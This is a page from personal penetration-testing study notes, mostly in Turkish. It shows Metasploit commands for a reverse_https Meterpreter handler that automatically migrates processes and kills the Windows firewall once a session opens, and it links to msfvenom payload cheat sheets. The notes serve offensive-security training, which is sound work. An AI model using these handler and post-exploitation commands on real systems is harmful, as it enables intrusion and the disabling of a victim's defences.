messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page

Was this helpful?

Metasoloit & Meterpreter & msfvenom

Previousfundamental blogNextat-tftp server 1.9

Last updated 5 years ago

Was this helpful?

Create Backdoor All Format;

Eğer bir meterpreter oturumu alındıktan çok kısa bir süre sonra sonlanıdırılıyor ise (örneğin 5 saniye); bu durumda multi handler modülünde bulunan AutoRunScript parametresi kullanılarak, oturum elde edilir edilmez doğrudan auto bir şekilde migration işlemini gerçekleştiririr.

msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb


<!-- The contents of /root/mycommands.rb include: -->
root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfw

Daha makul bir kullanım aşağıdaki şekildedir.

msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set AutoRunScript post/windows/manage/migrate
msf>set lhost <local IP>
msf> set lport <local port>
msf>exploit
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)Infinite Logins
Creating Metasploit PayloadsNetSec
Logo
Logo